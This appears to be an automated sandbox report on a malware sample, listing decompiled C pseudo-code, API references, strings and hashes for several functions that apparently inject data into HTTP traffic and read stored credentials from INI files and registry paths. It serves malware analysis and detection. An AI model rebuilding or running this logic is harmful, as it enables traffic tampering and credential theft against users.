						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E00411DB1(E00411CFE( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x422adc);
					_t107 =  *0x422b00(_t179, _a8, _a12);
					_t199 = _t197 + 0xc;
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x422adc);
					_t108 = E0040EEAE(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x422ad8();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x422af8;
						_v36 = _t176;
						if(_t168 > 0) {
							E00411D3A( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E0040F734(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E0040F8DE( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E0041BA1E( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E00411CCE( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E00411D3A(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
										_push(_t155);
										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
											E004124A7(_t199 + 0x28);
											_t188 = E00416CAC(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
											E00411D3A(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E00412A35(_t131, _t177, _t191);
											E00411D3A(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E00411D3A(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E00411D3A(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
										}
										E00411CFE( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E00411CFE(_v48);
							}
							_t153 = 0x422adc;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E0041BF3C( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x422af8;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4336356
					if(E00411C89( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

0x0040fb16
0x0040fb1c
0x0040fb21
0x0040fb26
0x0040fe13
0x0040fe1a
0x00000000
0x0040fb40
0x0040fb46
0x0040fb4c
0x0040fb4e
0x0040fb56
0x0040fe0c
0x0040fe0d
0x00000000
0x0040fe0d
0x0040fb5f
0x0040fb69
0x0040fda5
0x0040fda8
0x0040fdab
0x0040fdab
0x0040fdae
0x0040fdb3
0x0040fdbf
0x0040fdc4
0x0040fdca
0x0040fdcd
0x0040fddb
0x0040fddb
0x0040fde1
0x0040fde7
0x0040fe23
0x0040fe29
0x0040fe29
0x0040fb73
0x00000000
0x00000000
0x0040fb7a
0x0040fb87
0x0040fb8d
0x0040fb90
0x0040fb97
0x0040fe06
0x0040fe06
0x00000000
0x0040fe06
0x0040fb9e
0x0040fba0
0x0040fba5
0x0040fbaa
0x0040fdeb
0x0040fdeb
0x0040fded
0x0040fdf2
0x0040fdf2
0x0040fdf8
0x0040fdff
0x0040fe00
0x00000000
0x0040fe00
0x0040fbb0
0x0040fbb6
0x0040fbda
0x0040fbdd
0x0040fbe3
0x0040fbe9
0x0040fbf6
0x0040fbfb
0x0040fbfb
0x0040fc08
0x0040fc0d
0x0040fc14
0x0040fc38
0x0040fc3d
0x0040fc44
0x0040fc64
0x0040fc71
0x0040fc82
0x0040fc84
0x0040fc8a
0x0040fc99
0x0040fca3
0x0040fca4
0x0040fce0
0x0040fd00
0x0040fd05
0x0040fd0a
0x0040fd0a
0x0040fca6
0x0040fca6
0x0040fcad
0x0040fcaf
0x0040fcbc
0x0040fcbf
0x0040fccb
0x0040fcce
0x0040fcd3
0x0040fcd7
0x0040fcd7
0x0040fd0c
0x0040fd13
0x0040fd28
0x0040fd28
0x0040fd2d
0x0040fd32
0x0040fd38
0x0040fd3b
0x0040fd3b
0x0040fc8a
0x0040fd42
0x0040fd47
0x0040fd47
0x0040fd4c
0x0040fd4c
0x0040fd57
0x0040fd6e
0x0040fd6e
0x0040fd7b
0x0040fd81
0x0040fd87
0x0040fd8d
0x0040fd90
0x0040fd93
0x0040fd96
0x0040fd9b
0x0040fd9f
0x0040fda2
0x00000000
0x0040fda2
0x0040fd70
0x0040fd75
0x00000000
0x00000000
0x00000000
0x0040fd59
0x0040fd5d
0x0040fd6a
0x00000000
0x0040fd6a
0x0040fd5f
0x0040fd60
0x00000000
0x0040fd60
0x0040fd57
0x0040fbbb
0x0040fbc4
0x0040fbc6
0x0040fbd0
0x00000000
0x00000000
0x0040fbd6
0x00000000
0x0040fbd6

APIs

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61

EnterCriticalSection.KERNEL32(00422ADC), ref: 0040FB4C
LeaveCriticalSection.KERNEL32(00422ADC), ref: 0040FB7A
EnterCriticalSection.KERNEL32(00422ADC), ref: 0040FB9E
LeaveCriticalSection.KERNEL32(00422ADC,00000000,?,00000000), ref: 0040FDE1
LeaveCriticalSection.KERNEL32(00422ADC), ref: 0040FE00

Part of subcall function 00416CAC: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-00422AF8,?,00000000), ref: 00416D06

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

LeaveCriticalSection.KERNEL32(00422ADC), ref: 0040FE0D

Strings

%x, xrefs: 0040FCA6
0, xrefs: 0040FCC6
Content-Length, xrefs: 0040FCEA

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$Content-Length
API String ID: 4067213518-3838797520
Opcode ID: 36166e822732b5ed32df5380d2aba68cc5eadf3fcd596d91f0b1d5285327b382
Instruction ID: eaa3ba72823be4c93699e6069b60e580a5e08bd1d37d34cc4a6b3d91dabfa8e0
Opcode Fuzzy Hash: 36166e822732b5ed32df5380d2aba68cc5eadf3fcd596d91f0b1d5285327b382
Instruction Fuzzy Hash: FD91C171500212AFC720DF25DD41A5A7BB4FF84314F000A3AF951A76A1D778E999CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA1E, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 367
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041BA1E(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				struct _SYSTEMTIME _v876;
				char _v900;
				signed int _v968;
				signed int _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v996;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t254;
				signed int _t255;
				void* _t257;
				intOrPtr _t258;
				short* _t261;
				void* _t280;
				intOrPtr* _t286;
				signed int _t291;
				long _t294;
				signed short* _t296;
				signed short* _t298;
				signed int _t301;
				intOrPtr* _t303;
				signed int _t307;
				void* _t309;

				_t257 = __ecx;
				_t309 = (_t307 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t3 = _t257 + 0x10; // 0x10f
					_t286 = _t3;
					_v1048 = _t286;
					_v1028.wDayOfWeek = __eax;
					do {
						_t258 =  *_t286;
						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t279;
						if(_t258 == 0) {
							_t254 = _a8;
							L6:
							_t259 =  *(_t286 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
							_v1028.wSecond = _t158;
							if(_t259 >= _t158) {
								L35:
								_t159 =  *(_t286 - 0x10);
								_t294 = 0;
								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t255 = E00411F3E(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t255;
										if(_t255 != 0) {
											_t188 = 9;
											E00419897(_t188,  &_v996);
											_push(_v1052);
											E00407CCA(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
											_t309 = _t309 + 0x18;
											E00411CFE(_t255);
										}
									} else {
										_t280 = 0x3c;
										E00411DB1( &_v996,  &_v996, 0, _t280);
										_v992 =  &_v800;
										_v1008 = _t280;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t306 =  &_v876;
											_t199 = 8;
											E00419897(_t199,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E004129F1( &_v876, 0x104,  &_v540, _t306);
											_t309 = _t309 + 0x14;
											E00407B20(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t286 = _v1084;
										}
									}
									E00411CFE(_v1052);
									_t294 = 0;
								}
								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x423a34);
										E00411CFE( *0x423a4c);
										_t168 = E0041215C(E00411CFE( *0x423a50) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
										 *0x423a4c = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x423a50 = E0041215C(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
										LeaveCriticalSection(0x423a34);
										goto L51;
									}
									E0041CDE0( &_v860, _t259, 1,  &_v996);
									if(E00412FA3( &_v900,  *((intOrPtr*)(_t286 - 4)), E0041283B( *((intOrPtr*)(_t286 - 4)))) == 0) {
										goto L51;
									}
									_t261 =  &_v860;
									do {
										E00412066( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
										_t294 = _t294 + 1;
										_t261 = _t261 + 4;
									} while (_t294 < 0x10);
									 *_t261 = 0;
									GetLocalTime( &_v876);
									E00415F81(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t279 =  *_t211 & 0x0000ffff;
								if(_t279 != 4) {
									_t259 = _t211 + 4;
									_t218 = E0041AD44(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v1028.wYear < _v1028.wSecond) {
											_t259 = _v1028.wYear;
											L9:
											_t211 = ( *_t259 & 0x0000ffff) + _t259;
											_t296 = ( *_t211 & 0x0000ffff) + _t211;
											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
											_t279 =  *_t259 & 0x0000ffff;
											_v1036 = _t259;
											_v1044 = _t211;
											_v1040 = _t296;
											if(( *_t259 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v1060 = _v1060 & 0x00000000;
												goto L13;
											}
										}
										_t286 = _v1048;
										goto L35;
									}
									__eflags =  *_v1036 - 4;
									_t298 = _v1040;
									if( *_v1036 != 4) {
										_t54 =  &_v1056;
										 *_t54 = _v1056 + _v1060;
										__eflags =  *_t54;
									} else {
										_v1060 = _v1056;
									}
									L22:
									_t259 = _v1056 - _v1060;
									_t222 =  *(_v1048 - 0x10);
									_t291 = ( *_t298 & 0x0000ffff) - 4;
									_v1044 = _t259;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E00411C89(_t259 + _t291 + _v1064 + 2,  &_v1052);
											__eflags = _t224;
											if(_t224 != 0) {
												_t301 = _v1052;
												__eflags = _t291;
												if(_t291 != 0) {
													E00411D3A(_v1064 + _t301,  &(_v1040[2]), _t291);
													_t84 =  &_v1076;
													 *_t84 = _v1076 + _t291;
													__eflags =  *_t84;
												}
												_t279 = _v1044;
												_t227 = E00411D3A(_v1064 + _t301,  *_t254 + _v1060, _t279);
												_t259 = _v1060;
												__eflags =  *(_t259 - 0x10) & 0x00000100;
												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
													_t228 = E0041692F(_t227, _t279);
													_t95 =  &_v1068;
													 *_t95 = _v1068 + _t228;
													__eflags =  *_t95;
													_t254 = _a8;
												} else {
													_v1064 = _v1064 + _t279;
												}
												_t229 = _v1064;
												 *((char*)(_t229 + _t301)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v1064 = _t230;
												 *((char*)(_t230 + _t301)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t259 + _t291;
										_t240 = E00411CCE( *_a12 - _t259 + _t291);
										_v1044 = _t240;
										if(_t240 != 0) {
											_t279 = _v1060;
											_t242 = E00411D3A(E00411D3A(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
											_t303 = _a12;
											_t259 =  *_t254 + _v1080;
											E00411D3A(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
											E00411CFE( *_t254);
											_v1072 = _v1072 + 1;
											 *_t254 = _v1084;
											 *_t303 = _v1076;
										}
									}
									goto L33;
								}
								if( *_t259 != _t279) {
									_t250 = _v1060;
								} else {
									_t250 =  *_a12;
								}
								_v1056 = _t250;
								goto L22;
								L11:
								_t215 = E0041AD44(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t298 = _v1040;
								_t211 = _v1044;
								_t259 = _v1036;
								goto L13;
							}
						}
						_v996 = 0x2a3f;
						_v992 = _t258;
						_t160 = E0041283B(_t258);
						_t254 = _a8;
						_v988 = _t160;
						_v984 =  *_t254;
						_t279 = _t279 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t279;
						if(E00412C82( &_v996) != 0) {
							goto L6;
						}
						L51:
						_t286 = _t286 + 0x1c;
						_t150 =  &(_v1028.wDayOfWeek);
						 *_t150 = _v1028.wDayOfWeek - 1;
						_v1048 = _t286;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

0x0041ba1e
0x0041ba24
0x0041ba2a
0x0041ba34
0x0041bebf
0x0041bec6
0x0041becf
0x0041ba3a
0x0041ba3a
0x0041ba3a
0x0041ba3d
0x0041ba41
0x0041ba45
0x0041ba48
0x0041ba4d
0x0041ba50
0x0041ba56
0x0041ba98
0x0041ba9b
0x0041ba9b
0x0041baa1
0x0041baa6
0x0041baab
0x0041baad
0x0041bab3
0x0041bcb5
0x0041bcb5
0x0041bcb8
0x0041bcbc
0x0041bcd1
0x0041bd96
0x0041bd98
0x0041bd9a
0x0041bda2
0x0041bda3
0x0041bda8
0x0041bdb8
0x0041bdbd
0x0041bdc1
0x0041bdc1
0x0041bcd7
0x0041bcd9
0x0041bce1
0x0041bced
0x0041bcfb
0x0041bcff
0x0041bd10
0x0041bd25
0x0041bd2d
0x0041bd34
0x0041bd35
0x0041bd3f
0x0041bd45
0x0041bd50
0x0041bd58
0x0041bd68
0x0041bd6d
0x0041bd7f
0x0041bd84
0x0041bd84
0x0041bd10
0x0041bdca
0x0041bdcf
0x0041bdcf
0x0041bdd4
0x0041bdde
0x0041be6b
0x0041be77
0x0041be8d
0x0041be92
0x0041be9a
0x0041bea3
0x0041bea8
0x00000000
0x0041bea8
0x0041bdf2
0x0041be10
0x00000000
0x00000000
0x0041be16
0x0041be1d
0x0041be24
0x0041be29
0x0041be2a
0x0041be2d
0x0041be34
0x0041be3f
0x0041be5e
0x0041be5e
0x00000000
0x0041bab9
0x0041bab9
0x0041bb1e
0x0041bb1e
0x0041bb24
0x0041bb57
0x0041bb5e
0x0041bb63
0x0041bb65
0x0041bca3
0x0041bcab
0x0041babb
0x0041babf
0x0041bac2
0x0041bac7
0x0041bace
0x0041bad2
0x0041bad5
0x0041bad9
0x0041badd
0x0041bae4
0x00000000
0x0041bae6
0x0041bae6
0x00000000
0x0041bae6
0x0041bae4
0x0041bcb1
0x00000000
0x0041bcb1
0x0041bb6f
0x0041bb73
0x0041bb77
0x0041bb87
0x0041bb87
0x0041bb87
0x0041bb79
0x0041bb7d
0x0041bb7d
0x0041bb8b
0x0041bb96
0x0041bb9a
0x0041bb9d
0x0041bba0
0x0041bba6
0x0041bc18
0x0041bc1a
0x0041bc2e
0x0041bc33
0x0041bc35
0x0041bc37
0x0041bc3b
0x0041bc3d
0x0041bc4f
0x0041bc54
0x0041bc54
0x0041bc54
0x0041bc54
0x0041bc5a
0x0041bc6b
0x0041bc70
0x0041bc74
0x0041bc7b
0x0041bc86
0x0041bc8b
0x0041bc8b
0x0041bc8b
0x0041bc8f
0x0041bc7d
0x0041bc7d
0x0041bc7d
0x0041bc92
0x0041bc96
0x0041bc9a
0x0041bc9a
0x0041bc9b
0x0041bc9f
0x0041bc9f
0x0041bc35
0x0041bba8
0x0041bbb1
0x0041bbb5
0x0041bbba
0x0041bbc0
0x0041bbc6
0x0041bbdc
0x0041bbe1
0x0041bbef
0x0041bbf7
0x0041bbfe
0x0041bc07
0x0041bc0b
0x0041bc11
0x0041bc11
0x0041bbc0
0x00000000
0x0041bba6
0x0041bb29
0x0041bb32
0x0041bb2b
0x0041bb2e
0x0041bb2e
0x0041bb36
0x00000000
0x0041baed
0x0041bb05
0x0041bb0a
0x0041bb0c
0x00000000
0x00000000
0x0041bb12
0x0041bb16
0x0041bb1a
0x00000000
0x0041bb1a
0x0041bab3
0x0041ba58
0x0041ba5f
0x0041ba63
0x0041ba68
0x0041ba6b
0x0041ba71
0x0041ba7a
0x0041ba81
0x0041ba85
0x0041ba90
0x00000000
0x0041ba96
0x0041beae
0x0041beae
0x0041beb1
0x0041beb1
0x0041beb5
0x0041beb5
0x00000000
0x0041ba45

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041BD07
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041BD25
GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,00000000,?,-00422ABC), ref: 0041BE3F
EnterCriticalSection.KERNEL32(00423A34,00000000,?,-00422ABC), ref: 0041BE6B
LeaveCriticalSection.KERNEL32(00423A34,?,?), ref: 0041BEA8

Strings

?*, xrefs: 0041BA58
4:B, xrefs: 0041BE65

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: 4:B$?*
API String ID: 2400141425-1216665951
Opcode ID: af5c2cb6450e6a285a9a9a11972c60d91ea8f1e2381c9d23fbd67db9ac9ff94b
Instruction ID: 580f3bbdbe8efc04fc3be9c94e5467b6e3cfd8db111a587e31f8e88b26786b6e
Opcode Fuzzy Hash: af5c2cb6450e6a285a9a9a11972c60d91ea8f1e2381c9d23fbd67db9ac9ff94b
Instruction Fuzzy Hash: D1E1AEB16083019FC710DF69C980AABB7E5FF88314F004A1EF99597351D778E985CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00409608, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409608(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E00411DB1( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E00419897(_t46,  &_v252);
				_t48 = 0x6b;
				E00419897(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E00415E26(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E0040941C(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E00419897(_t57,  &_v64);
					_t59 = 0x6e;
					E00419897(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E00419897(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E004093DA(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E00417437( &_v772,  &_v24, 0, 3, 2, E004095BF,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E00411CFE(_v12);
						}
						_push(0xcb);
						return E00407DEB(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E00419897(_t68,  &_v180);
					_t70 = 0x6c;
					E00419897(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E00415E26(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E004093DA(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x00409608
0x00409608
0x0040961c
0x00409629
0x0040962a
0x00409634
0x00409635
0x0040964a
0x00409655
0x0040965d
0x0040965f
0x00409661
0x0040966e
0x0040967f
0x0040968b
0x0040968b
0x00409661
0x00409691
0x00409696
0x004097b6
0x004097b6
0x00000000
0x0040969c
0x004096a1
0x004096a2
0x004096af
0x004096b0
0x004096b7
0x004096ba
0x004096bb
0x004096c3
0x004096cc
0x004096d1
0x004096d8
0x004096df
0x004096e6
0x004096ed
0x004096f0
0x004096f0
0x00409701
0x00409709
0x0040970b
0x0040970e
0x0040971c
0x00409723
0x00409723
0x0040973c
0x0040973f
0x00409745
0x00409745
0x0040974a
0x0040974b
0x00409754
0x004097ba
0x004097ba
0x00000000
0x004097d1
0x004097bf
0x00000000
0x004097c7
0x0040975e
0x0040975f
0x00409769
0x0040976a
0x0040977a
0x00409785
0x0040978d
0x0040978f
0x00409791
0x0040979e
0x004097b1
0x004097b1
0x00409791
0x00000000
0x0040978d

APIs

Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040966E

Part of subcall function 0040941C: GetPrivateProfileStringW.KERNEL32 ref: 00409453
Part of subcall function 0040941C: StrStrIW.SHLWAPI(?,?), ref: 004094DB
Part of subcall function 0040941C: StrStrIW.SHLWAPI(?,?), ref: 004094EC
Part of subcall function 0040941C: GetPrivateProfileStringW.KERNEL32 ref: 00409508
Part of subcall function 0040941C: GetPrivateProfileStringW.KERNEL32 ref: 00409526

PathRemoveFileSpecW.SHLWAPI(?), ref: 0040968B

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00409701
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0040979E

Strings

&, xrefs: 004096DF
#, xrefs: 004096E6
$, xrefs: 004096D1

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: ee73a04a3a1538a47c6cd8fd8870fc9e7318cb7e39b62ca065c76025fa04432e
Instruction ID: a5ed6178a4cec787c261ff58a7b3d6418724bc6d2d0a69ef08ed37be3f107547
Opcode Fuzzy Hash: ee73a04a3a1538a47c6cd8fd8870fc9e7318cb7e39b62ca065c76025fa04432e
Instruction Fuzzy Hash: D1512C72D00219AADF20EBA1DC55FEF77BCAB48314F0005A7B609F7181D7789E858B55

Uniqueness

Uniqueness Score: -1.00%

Function 00410316, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00410316(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				signed int _t32;
				void* _t36;
				intOrPtr _t39;
				WCHAR* _t45;
				MSG* _t54;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t54 = _a4;
